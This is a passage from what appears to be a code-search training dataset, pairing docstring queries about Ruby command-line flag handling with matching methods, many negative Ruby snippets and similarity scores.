"0.60491186",
"0.6028328",
"0.59460676",
"0.592124",
"0.5807492",
"0.578661",
"0.5730183",
"0.5730183",
"0.56504935",
"0.5626171",
"0.5596782",
"0.55833936",
"0.5562892",
"0.5558395",
"0.55371296",
"0.5529985",
"0.55254084",
"0.550028",
"0.5498306",
"0.54610884",
"0.5452953",
"0.5448171",
"0.5443153",
"0.54057145",
"0.5393011",
"0.53580284",
"0.53198564",
"0.5297528",
"0.52436084",
"0.5238536",
"0.5225288",
"0.5191688",
"0.5181225",
"0.51696485",
"0.51629317",
"0.51629317",
"0.5141602",
"0.512931",
"0.5125351",
"0.5103369",
"0.5102546",
"0.50960237",
"0.50949335",
"0.5088183",
"0.5087261",
"0.5075209",
"0.5068106",
"0.50452584",
"0.5043314",
"0.50413436",
"0.50403756",
"0.50332594",
"0.5032046",
"0.50320303",
"0.5000553",
"0.49554086",
"0.49456102",
"0.4921939",
"0.49217355",
"0.49199674",
"0.49179968",
"0.49129474",
"0.49009958",
"0.48992848",
"0.48766378",
"0.48671076",
"0.48513842",
"0.48430872",
"0.48318136",
"0.48285815",
"0.48280758",
"0.4827478",
"0.48102763",
"0.48024434",
"0.4800768",
"0.4785696",
"0.47828892",
"0.47765368",
"0.4776312",
"0.47701102",
"0.47701102",
"0.47686848",
"0.47671086",
"0.47634205",
"0.47595567",
"0.47574952",
"0.4756902",
"0.47553086"
] | 0.72635776 | 0 |
An array of Flag::Syntax including only long (doubledash) flags. | def long_flag_syntax
@long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def flags\n [long, short].compact\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def to_argv\n flags = []\n each do |f,v|\n m = f.to_s.size == 1 ? '-' : '--'\n case v\n when Array\n v.each{ |e| flags << \"#{m}#{f}='#{e}'\" }\n when true\n flags << \"#{m}#{f}\"\n when false, nil\n # nothing\n else\n flags << \"#{m}#{f}='#{v}'\"\n end\n end\n flags\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def valid_options\n %i(\n\n ) # end array\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def flag\n flags.join(\", \")\n end",
"def canonical_syntax_strings\n @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def get #:nodoc:\n p = Array.new\n p.push(@long_form)\n p.push(@short_form) if @short_form != \"\"\n p.push(@arg_flag)\n return p\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def flag _args\n \"flag _args;\" \n end",
"def thor_options_to_optparse\n flags = []\n %i[color progress debug interactive].each do |option|\n if options[option] then flags << \"--#{option}\"\n else flags << \"--no-#{option}\"\n end\n end\n flags\n end",
"def lame_flag_map\n { '--tt': :title,\n '--ta': :artist,\n '--tl': :album,\n '--ty': :year,\n '--tn': :t_num,\n '--tg': :genre }\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def for_option_parser\n [short, long, return_type, description].flatten.reject{ |o| o.to_s.empty? }\n end",
"def options # :nodoc:\n [].tap do |o|\n o << \"Lazy\" if lazy?\n o << \"Reverse\" if reverse?\n o << \"Exclude [#{all_excluded_words.join(\", \")}]\" if excluded_words.any?\n o << \"No Options\" if o.empty?\n end\n end",
"def syntax\n t = @cmd_args\n t = [[t]] if !t.is_a? Array\n\n args = [] \n count = 0\n t.each do |expected_array|\n count += 1\n if count == 1\n str = \"Syntax: #{@cmd_name}\"\n else\n str = \" #{@cmd_name}\"\n end\n expected_array.each do |expected|\n # each expected arg.\n str += case expected\n when :arg_none then \"\"\n when :arg_dir! then \" <direction>\"\n when :arg_str! then \" <string literal>\"\n when :arg_word!then \" <word>\"\n when :arg_int! then \" <#>\"\n when :arg_obj_inv! then \" <item>\"\n when :arg_obj_room! then \" <item>\"\n when :arg_obj_inv_or_room! then \" <item>\"\n when :arg_class! then \" <Class>\"\n when :arg_player_in_game! then \" <player in game>\"\n when :arg_player_offline! then \" <any player>\"\n when :arg_actor_room! then \" <npc/player>\"\n when String then \" \" + expected \n else \"\"\n \n end\n end \n args << str\n end\n return args\n end",
"def switches\n [short, long].map(&:to_s)\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def optparse_args\n if short\n [\"--#{name}\", \"-#{short}\", desc, :REQUIRED]\n else\n [\"--#{name}\", desc, :REQUIRED]\n end\n end",
"def normalize_flags(flags)\n if flags.is_a?(Array)\n flags.uniq.sort.join(' ')\n else\n flags\n end\n end",
"def long_opt_symbol(args); end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def test_multi_stringflag_as_strings\n opts = @p.parse %w(--xyz dog --xyz cat)\n assert_equal true, opts[:xyz_given]\n assert_equal [\"dog\",\"cat\"], opts[:xyz]\n assert_equal [], opts[:abc] # note, multi-args default to empty array\n assert_nil opts[:ghi_given]\n assert_equal [\"gg\",\"hh\"], opts[:ghi]\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def getopt_args\n if short\n [[\"--#{name}\", \"-#{short}\", GetoptLong::REQUIRED_ARGUMENT]]\n else\n [[\"--#{name}\", GetoptLong::REQUIRED_ARGUMENT]]\n end\n end",
"def flag(*names)\n names = [names].flatten\n GLI.verify_unused(names,flags,switches,\"in command #{name}\")\n flag = Flag.new(names,@next_desc,@next_arg_name,@next_default_value,@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def format_flags(flags)\n # other flags like \"Old\" should be hidden here\n flags = flags.map {|flag| FLAGMAP[flag] || flag}\n flags.delete(\"Old\")\n if flags.delete(:Seen).nil?\n flags << '+' # unread\n end\n flags.join('')\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def mask_array\n @mask.split('')\n end",
"def flags=(flags)\n self.flag_attr = flags.map{|flag| flag.to_s}.join(\", \");\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def get_flag_path_array problem, solution, comment, flag\n if solution.nil?\n path = [problem, comment, flag]\n elsif comment.nil?\n path = [problem, solution, flag]\n else\n path = [problem, solution, comment, flag]\n end\n path\n end",
"def switches\n [long, negative_long, short].compact\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def flags\n @flags ||= Array.wrap(Flag.where(:published => true))\n end",
"def as_flag_collection(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << [flag, flag_enabled?(flag, colmn)]\n end\n end",
"def symbols\n @flags.keys\n end",
"def flag(*names)\n names = [names].flatten\n verify_unused(names,flags,switches,\"in global options\")\n flag = Flag.new(names,@@next_desc,@@next_arg_name,@@next_default_value,@@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def parse argv\n @bare.clear\n eoo = argv.index '--' # end of options\n if eoo\n tail = argv[eoo+1 .. ]\n argv = argv[ .. eoo-1]\n end\n re = /^-{1,2}(?=[^-])/\n for first,second in argv.chunk_while{ _1 =~ re and _2 !~ re }\n case first\n when /^--(?i:no)-(?=[^-])/\n # --no-long\n p = plong $~.post_match\n raise \"#{p.long} is not boolean\" unless p.boolean\n @buffer[p] = false\n @bare.push second if second\n when /^--(?=[^-])/\n # --long\n p = plong $~.post_match\n if p.boolean\n @buffer[p] = true\n @bare.push second if second\n else\n @buffer[p] = second\n end\n when /^-(?=[^-])(?!.*[0-9])/\n # -short\n letters = $~.post_match.chars\n b,o = letters.map{ pshort _1 }.partition &:boolean\n b.each{ @buffer[_1] = true }\n o.each{ @buffer[_1] = nil }\n if second\n if o.empty?\n @bare.push second\n else\n @buffer[o.pop] = second\n end\n end\n else\n # bare\n @bare.push first\n end\n end\n @bare.concat tail if tail\n end",
"def chained_flags_with_signature(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n truthy_and_chosen =\n selected_flags(colmn).\n select { |flag| flags_to_collect.include?(flag) }\n truthy_and_chosen.concat(\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << \"not_#{flag}\".to_sym unless truthy_and_chosen.include?(flag)\n end\n )\n end",
"def program_options\n [\n # The values of the array are,\n # [long_option, short_option and parameter, description, code to execute]\n ['--google', '-g', \"Format for Google blogger.\",\n lambda { |value| options.google = true }\n ],\n ['--jayway', '-j', \"Format for Jayway blog.\",\n lambda { |value| options.jayway = true }\n ],\n ['--utf', '-u', \"Include meta charset utf8\",\n lambda { |value| options.utf = true }\n ],\n ['--stylesheet', '-s', \"Add a stylesheet, md.css\",\n lambda { |value| options.stylesheet = true }\n ],\n ['--verbose', '-v', \"Log to standard output.\",\n lambda { |value| options.verbose = true }\n ],\n ['--version', '-V', \"Display the program version.\",\n lambda { |value|\n puts \"#{program_name}, version #{PROGRAM_VERSION}\"\n exit\n }\n ]\n ]\nend",
"def split_args(ary)\n\tfiles = []\n\topts = []\n\tc = false\n\tary.each do |i|\n\t\tnext if i == '-'\n\t\tif i == '--' then\n\t\t\tc = true\n\t\t\tnext\n\t\tend\n\t\tfiles << i if c or not (i =~ /^-/)\n\t\topts << i if (not c) and (i =~ /^-/)\n\tend\n\t[files, opts]\nend",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def flag(*names)\n options = extract_options(names)\n names = [names].flatten\n\n verify_unused(names)\n flag = Flag.new(names,options)\n flags[flag.name] = flag\n\n clear_nexts\n flags_declaration_order << flag\n flag\n end",
"def parse(args)\n arg_list = arg_groups(args)\n options = DEFAULT_OPTIONS.dup\n options[:exclude] += default_excludes\n options[:locations] = arg_list.shift\n\n arg_list.reject(&:empty?).each do |set|\n flag, *args = set\n args.map! { |arg| arg.delete(\"/\") } # \"log/\" => \"log\"\n\n case flag\n when '-f', '--flags' then options[:flags] += args\n when '-e', '--exclude' then options[:exclude] += args\n else puts \"Unknown argument: #{flag}\"\n end\n end\n\n options\n end",
"def arg_groups(args)\n result = []\n buf = []\n\n # No dir was passed, use default\n if args.empty? || args.first.start_with?('-')\n result << [ Notes.root ]\n end\n\n args.each do |arg|\n if ALL_FLAGS.include?(arg)\n result << buf unless buf.empty?\n buf = []\n end\n buf << arg\n end\n\n result << buf\n end",
"def get_real_args(args)\n real_args = []\n args.each do |arg|\n real_args << arg if arg !~ /^-/\n end\n replace_short_aliases real_args\n end",
"def yardopts(file = options_file)\n return [] unless use_yardopts_file\n File.read_binary(file).shell_split\n rescue Errno::ENOENT\n []\n end",
"def _list_args args\n incl = []\n excl = []\n args.each do |e| \n if e[0] == '+'\n incl << e[1..-1]\n elsif e[0] == '-'\n excl << e[1..-1]\n else\n incl << e\n end\n end\n incl = nil if incl.empty?\n excl = nil if excl.empty?\n return incl, excl\n end",
"def _list_args args\n incl = []\n excl = []\n args.each do |e| \n if e[0] == '+'\n incl << e[1..-1]\n elsif e[0] == '-'\n excl << e[1..-1]\n else\n incl << e\n end\n end\n incl = nil if incl.empty?\n excl = nil if excl.empty?\n return incl, excl\n end",
"def names\n @opt_types.keys.map {|e| undasherize e }\n end",
"def to_options_array\n options_array = []\n attributes.each do |attr_name, value|\n next if value.blank?\n\n # explicit check for == true to flag-only options that have no value, like --extract \"['cluster', 'metadata']\"\n if value == true\n options_array << Parameterizable.to_cli_opt(attr_name)\n else\n options_array += [Parameterizable.to_cli_opt(attr_name), value.to_s]\n end\n end\n options_array << self.class::PARAMETER_NAME if defined? self.class::PARAMETER_NAME\n options_array\n end",
"def extract_command_flags!(parameters)\n raw_command_flags = parameters.flatten.find_all { |arg| arg.start_with? \"--\" }\n parameters.delete_if { |param| raw_command_flags.include? param }\n\n flag_names = raw_command_flags.map { |flag| flag[/--(.+)$/,1].underscore.to_sym }\n flag_values = [ true ] * flag_names.count\n Hash[flag_names.zip(flag_values)]\n end",
"def flags; end",
"def ruby_pants_options\n {\n double_left_quote: '“',\n double_right_quote: '”',\n single_left_quote: '‘',\n single_right_quote: '’',\n ellipsis: '…',\n em_dash: '—',\n en_dash: '–',\n }\n end",
"def ruby_pants_options\n {\n double_left_quote: '“',\n double_right_quote: '”',\n single_left_quote: '‘',\n single_right_quote: '’',\n ellipsis: '…',\n em_dash: '—',\n en_dash: '–',\n }\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def read_argv_flags argsIn\r\n skipVal = argsIn.length + 1\r\n argsIn.each_with_index do |argIn, ind|\r\n next if skipVal == ind\r\n arg = argIn.downcase()\r\n if arg[0].eql? '-'\r\n symAgr = strip_to_sym(arg)\r\n if @options[symAgr].is_a? String\r\n @options[symAgr] = argsIn[ind + 1]\r\n skipVal = ind + 1\r\n elsif @options[symAgr] == false\r\n @options[symAgr] = true\r\n elsif @options[symAgr].is_a? Array\r\n @options[symAgr] = argsIn[ind + 1]\r\n end\r\n elsif known_file_type arg\r\n @options[:f] << argIn.gsub(/(\\.\\/)|(\\.\\\\)/,'')\r\n end\r\n puts argIn\r\n end\r\n end",
"def command_arguments(options={})\n args = []\n args.concat(['--type', options[:type].to_s]) if options[:type]\n args.concat(['--line-break', options[:line_break].to_s]) if options[:line_break]\n args.concat(['--charset', options[:charset].to_s]) if options[:charset]\n\n if options[:type].to_s == 'js'\n args << '--nomunge' unless options[:munge]\n args << '--preserve-semi' if options[:preserve_semicolons]\n args << '--disable-optimizations' unless options[:optimize]\n end\n\n args\n end",
"def parse_options(args) # :nodoc:\n global_options,command,options,arguments = parse_options_helper(args.clone,Hash.new,nil,Hash.new,Array.new)\n flags.each { |name,flag| global_options[name] = flag.default_value if !global_options[name] }\n command.flags.each { |name,flag| options[name] = flag.default_value if !options[name] }\n return [global_options,command,options,arguments]\n end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def add_flags(flags)\n metadata[:remove] ||= []\n metadata[:add] ||= []\n\n flags.each do |flag|\n if !self.flags.find_by_name(flag)\n f = self.flags.create(:name => flag)\n if rule = Flag.get_rule(flag)\n metadata[:remove] |= rule[0]\n metadata[:add] |= rule[1]\n end\n else\n if rule = Flag.get_rule(flag)\n metadata[:remove] |= rule[0]\n metadata[:add] |= rule[1]\n end\n end\n end\n\n [metadata[:remove], metadata[:add]]\n end",
"def required_flags\n flags.select &:required\n end",
"def flag()\n\tb=[0,0.2,0.6]\n\ty=[0.8,0.8,0.2]\n\tr=[1,0,0]\n\t\n\t[[b,b,y,y,r,r],\n\t[b,b,y,y,r,r],\n\t[b,b,y,y,r,r],\n\t[b,b,y,y,r,r],\n\t[b,b,y,y,r,r]]\nend",
"def build_flags(*flags)\n _flags = *flags\n\n unless _flags.is_a?(Integer)\n _flags = MAGIC_NONE\n\n flags.flatten.each { |flag|\n if value = flag.is_a?(Integer) ? flag : MAGIC_FLAGS[flag.to_sym]\n _flags |= value\n else\n raise ArgumentError, \"#{value.nil? ? 'no such flag' : 'flag not available'}: #{flag}\"\n end\n }\n end\n\n _flags\n end",
"def handle_long_dash(string)\n words = string.split('--')\n @in_brackets ? close_brackets(words) : open_brackets(words)\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def range_all\n [ range(:upper_alphas), \n range(:lower_alphas), \n range(:numerals), \n range(:symbols_1), \n range(:symbols_2), \n range(:symbols_3), \n range(:symbols_4), \n range(:symbols_5), \n range(:symbols_6),\n range(:single_quotes),\n range(:double_quotes),\n range(:backtick) ]\n end",
"def option_list\n result = @options.dup\n result << \"-o\" << @rdoc_dir\n result << \"--main\" << main if main\n result << \"--markup\" << markup if markup\n result << \"--title\" << title if title\n result << \"-T\" << template if template\n result << '-f' << generator if generator\n result\n end",
"def disable_flag(*flags)\n check_definition_state(is_arg: true)\n flags = flags.uniq\n intersection = @used_flags & flags\n unless intersection.empty?\n raise ToolDefinitionError, \"Cannot disable flags already used: #{intersection.inspect}\"\n end\n @used_flags.concat(flags)\n self\n end",
"def stow_command_flags\n flags = ''\n flags += \"-t #{stow_target}\" unless stow_target.nil?\n flags += \"-d #{stow_path}\" unless stow_path.nil?\n flags\n end",
"def pack_flags(flags)\n FLAGS.each_with_index.inject(0) do |memo,(key,i)|\n memo |= i if flags[key]\n memo\n end\n end",
"def to_s\n @flags.join(', ')\n end",
"def initialize(flags_text)\n @flags = flags_text.split(/,/).map{ |flag_text| Flag.new(flag_text) }\n end",
"def _flag_nations\n %w{ar cc it de ie fr es en goo br po pt }.sort\nend",
"def long_name\n long.to_s.sub(/^(--.+?)(\\s+|\\=|\\[).*$/, \"\\\\1\")\n end",
"def flags\n input = @flags.clone\n tok = []\n\n # Set the output path\n throw 'Output pathname is required' if @output.nil?\n if Platform.is_windows?\n tok.push \"/OUT:\\\"#{@output}\\\"\"\n tok.push '/DLL' if @output =~ /\\.dll/i\n else\n tok.push '-o', @output\n end\n\n # Enable shared library output\n if @shared_library\n if Platform.is_windows?\n tok.push '/DLL'\n else\n tok.push '-shared'\n tok.push '-fPIC'\n end\n end\n\n # Assume that we want to link with shared libraries\n # built within this project\n unless Platform.is_windows?\n tok.push '-L', '.'\n end\n\n # Override the normal search path for the dynamic linker\n unless @rpath.nil?\n if Platform.is_solaris?\n input.push ['R', @rpath]\n elsif Platform.is_linux?\n input.push ['-rpath', @rpath]\n elsif Platform.is_windows?\n # XXX-FIXME Windows does not support the rpath concept\n else\n throw 'Unsupported OS'\n end\n input.push ['-L', @rpath]\n end\n\n input.each do |f|\n if @gcc_flags == true\n if f.kind_of?(Array)\n if f[0] == '-L'\n tok.push f.join(' ')\n else\n tok.push '-Wl,' + f[0] + ',' + f[1]\n end\n else\n tok.push '-Wl,' + f\n end\n else\n if f.kind_of?(Array)\n tok.push f.flatten.join(' ')\n else\n tok.push f\n end\n end\n end\n\n res = ' ' + tok.join(' ')\n return res\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n invocations = ([name] + Array(aliases)).map { |_| add_dashes(_) }.join('|')\n usage = \"#{invocations} #{arg_name || 'arg'}\"\n @io.puts \"#{@nest}=== #{usage}\"\n @io.puts\n @io.puts String(desc).strip\n @io.puts\n @io.puts \"[Default Value] #{default_value || 'None'}\"\n @io.puts \"[Must Match] #{must_match.to_s}\" unless must_match.nil?\n @io.puts String(long_desc).strip\n @io.puts\n end",
"def feature_flags_for(*flag_names)\n flag_names.map { |flag_name| feature_flag_as_hash(flag_name) }.reduce({}, :merge).with_indifferent_access\n end",
"def manual_description\n txt = (@flags.include?(:optional) ? '<' : '[') + @description\n if @type && @type != 'x'\n txt += _INTL(': {1}',@vararg ? '*'+type_name(@type) : type_name(@type))\n end\n txt += @flags.include?(:optional) ? '>' : ']'\n return txt\n end"
] | [
"0.6855186",
"0.6651415",
"0.66093004",
"0.64483005",
"0.6438081",
"0.6377476",
"0.6377476",
"0.6302847",
"0.6183081",
"0.61217344",
"0.6095984",
"0.6052623",
"0.6025771",
"0.59871995",
"0.5987073",
"0.59280264",
"0.5864525",
"0.5832347",
"0.5785188",
"0.5709738",
"0.5709738",
"0.5598666",
"0.5517512",
"0.5513288",
"0.54876184",
"0.54763305",
"0.5460119",
"0.54371536",
"0.54273224",
"0.5387855",
"0.5336057",
"0.5312157",
"0.5303376",
"0.52674425",
"0.52649736",
"0.5258698",
"0.5258491",
"0.524989",
"0.5240786",
"0.5215703",
"0.52133656",
"0.5213188",
"0.51823294",
"0.5175435",
"0.5172824",
"0.5167159",
"0.5161258",
"0.5156999",
"0.5136699",
"0.51354307",
"0.5132315",
"0.5100783",
"0.5073882",
"0.5071801",
"0.50660366",
"0.50627905",
"0.50576246",
"0.50493217",
"0.50409836",
"0.5018021",
"0.5018021",
"0.49978167",
"0.4997154",
"0.49822816",
"0.49769625",
"0.49725613",
"0.49261254",
"0.49223325",
"0.4911613",
"0.4911613",
"0.49047163",
"0.48714188",
"0.48701102",
"0.48660603",
"0.4862437",
"0.4862437",
"0.4854189",
"0.48448434",
"0.48343423",
"0.48151997",
"0.48068452",
"0.47974214",
"0.47936517",
"0.4788135",
"0.47874674",
"0.47838998",
"0.47797012",
"0.47774965",
"0.4776659",
"0.4775199",
"0.47701415",
"0.47668633",
"0.47667873",
"0.47649184",
"0.47590917",
"0.47555473",
"0.47513965",
"0.47503698",
"0.4750019",
"0.47496873"
] | 0.73501015 | 0 |
The list of all effective flags used. | def effective_flags
@effective_flags ||= flag_syntax.flat_map(&:flags)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def flags\n FLAGS.find_all{ |k,v| (self.Characteristics & k) != 0 }.map(&:last)\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def symbols\n @flags.keys\n end",
"def flags #:nodoc:\n @flags ||= {}\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def flags \n @flags ||= {}\n end",
"def flags\n [long, short].compact\n end",
"def list_bit_flags\n if (!@cached)\n @cached = lists.uniq.inject(0) { |memo,cur| memo |= (1 << cur) }\n end\n @cached\n end",
"def fflags\n set = FFI::MemoryPointer.new :ulong\n clear = FFI::MemoryPointer.new :ulong\n C.archive_entry_fflags(entry, set, clear)\n\n [set.get_ulong(0), clear.get_ulong(0)]\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def flagged_reasons\n return @flagged_reasons\n end",
"def all_flags\n res = get_request 'features'\n if res.status == 200\n JSON.parse(res.body, symbolize_names: true)\n else\n @config.logger.error(\"[LDClient] Unexpected status code #{res.status}\")\n {}\n end\n end",
"def all_flags\n res = get_request 'features'\n if res.status == 200\n JSON.parse(res.body, symbolize_names: true)\n else\n @config.logger.error(\"[LDClient] Unexpected status code #{res.status}\")\n {}\n end\n end",
"def flags\n flgs = []\n flgs << :prompt_now if 0 < @cred_struct[:flags] & Win32::Cred::CRED_FLAGS_PROMPT_NOW\n flgs << :username_target if 0 < @cred_struct[:flags] & Win32::Cred::CRED_FLAGS_USERNAME_TARGET\n flgs\n end",
"def flag\n flags.join(\", \")\n end",
"def flags\n if variables\n (variables[:all][:referenced_enables] + variables[:all][:set_enables]).uniq.sort do |x, y|\n x = x[0] if x.is_a?(Array)\n y = y[0] if y.is_a?(Array)\n # Need to use strings for the comparison as some flags can be a string and some a symbol\n x.to_s <=> y.to_s\n end\n end\n end",
"def flags; end",
"def flags\n @values.fetch('flags') { \n @values['flags'] = nil\n }\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def required_flags\n flags.select &:required\n end",
"def flags\n response[\"flags\"]\n end",
"def flags\n return @val\n end",
"def summary\n return desc.to_s.inspect unless desc.empty?\n flags.map(&:display_name).inspect\n end",
"def to_s\n @flags.join(', ')\n end",
"def show_elf_flags\n\t\t\t\tputs \" Flags: #{@elf_flags.to_h}\"\n\t\tend",
"def flags_resync\n if @flags\n self.class.flag_def.each do |f|\n sym = (f.flag_type=='Symbol' ? f.flag_name.to_sym : f.flag_name)\n i,p,v = self.class.index_position_value(f.position)\n sn=self.send(\"flags_#{i}\")||0\n b = sn & v > 0\n logger.warn \"#{@flags[sym].class} value '#{@flags[sym]}' for flag #{self.class}->#{sym} will be stored as true, not '#{@flags[sym]}'\" unless FlaggableTypes.include?(@flags[sym].class)\n if @flags[sym] && !b\n self.send(\"flags_#{i}=\",sn+v)\n elsif b && !@flags[sym]\n self.send(\"flags_#{i}=\",sn-v)\n end\n end\n end\n @flags\n end",
"def default_flags\n flags.select &:default\n end",
"def flags\n @flags ||= Array.wrap(Flag.where(:published => true))\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def flags\n fs = FRAME_FLAGS[type]\n [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80]\n .select { |v| @flags_value & v > 0 }\n .map { |val| fs && fs.key(val) || (\"unknown_%02x\" % val).to_sym }\n end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
